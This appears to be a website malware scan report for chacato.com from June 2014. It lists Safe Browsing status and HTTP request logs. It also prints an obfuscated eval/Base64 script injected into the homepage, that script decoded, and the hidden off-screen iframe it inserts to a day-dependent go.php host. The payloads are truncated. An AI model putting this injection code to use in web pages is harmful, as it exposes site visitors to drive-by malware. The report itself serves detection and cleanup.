Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=chacato.com
Result: The website is marked by Google as suspicious - visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious - visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://chacato.com/ | 200 OK Content-Length: 20086 Content-Type: text/html | malicious |
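Malicious code - confirmed by antiviruses (see below):
eval((function(r,s){var t='',p=-8,a=0,b,c;for(var i=0;i<s.length;i++){if((c=r.indexOf(s.charAt(i)))<0)continue;a=(a<<6)|(c&63);if((p+=6)>=0){b=(a>>p)&255;if(c!=64)t+=String.fromCharCode(b);a&=63;p-=8;}}return t;}('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=','dmFyIGtleXNzPSJhcDEybTNuNGo1aTZ1N2RoOGI5djBneXRmY2RyNWV3cWRhcyI7DQp2YXIgZW5jID0gWzUsIDMsIDEsIDExLCAzLCAxMSwgOCwgMTUsIDExLCAyMiwgOV07DQp2YXIgYWggPSBuZXcgRGF0ZSgpLmdldERhdGUoKSsxOw0KdmFyI
(The encoded payload is cut off at this point in the report. The inline function is a Base64 decoder, and its output is passed to eval.)
Decoded script:
var keyss="ap12m3n4j5i6u7dh8b9v0gytfcdr5ewqdas"; var enc = [5, 3, 1, 11, 3, 11, 8, 15, 11, 22, 9]; var ah = new Date().getDate()+1; var url="http://"; for (i=0;i<enc.length;i++) url+=keyss.substr((ah*enc[i]) % 31,1); url+=".org/ts/go.php?q=1"; fff="fram"; if (document.getElementsByTagName('body')[0]) { iframer();} else { document.write("<i"+fff+"e src='"+url+"' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></ var f = document.createElement('i'+fff+'e'); f.setAttribute('src', url); f.style.position = 'absolute'; f.style.left = '-1000px'; f.style.top = '-1000px'; f.setAttribute('width', '100'); f.setAttribute('height', '100'); document.getElementsByTagName('body')[0].appendChild(f); }
(The decoded excerpt is also incomplete: it breaks off inside the document.write string, and the definition of iframer() appears to be missing.)
Injected element as rendered at scan time:
<iframe src='http://ch3fhf57fbd.org/ts/go.php?q=1' width='100' height='100' style='position:absolute;left:-1000px;top:-1000px;'></iframe>
Note: the iframe host is not fixed. The script derives it from the visitor's day of the month (getDate()+1) using the keyss/enc tables, and ch3fhf57fbd.org is the value produced for day 4, which matches the 4 June scan date shown in the response headers. Only the .org suffix and the /ts/go.php?q=1 path are constant in the script, so blocking this single host does not cover other days. The iframe is positioned off-screen (-1000px), so visitors see nothing.
Antivirus reports: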
| ||
http://chacato.com/test404page.js | 404 Not Found Content-Length: 3671 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: chacato.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 04:56:10 GMT
Accept-Ranges: bytes
ETag: "4e76"
Server: Apache
Vary: *
Content-Length: 20086
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2013 16:45:44 GMT
...20086 bytes of data.
GET / HTTP/1.1
Host: chacato.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 Jun 2014 04:56:10 GMT
Accept-Ranges: bytes
ETag: "4e76"
Server: Apache
Vary: *
Content-Length: 20086
Content-Type: text/html
Last-Modified: Wed, 02 Jan 2013 16:45:44 GMT
...20086 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: chacato.com
Referer: http://www.google.com/search?q=chacato.com
Result:
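The result is similar to the first query; no suspicious redirects were found. (The infection reported above is a script injected into the 200 OK page body, so it does not appear as an HTTP redirect in this check.)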
GET / HTTP/1.1
Host: chacato.com
Referer: http://www.google.com/search?q=chacato.com
Result:
The result is similar to the first query. There are no suspicious redirects found.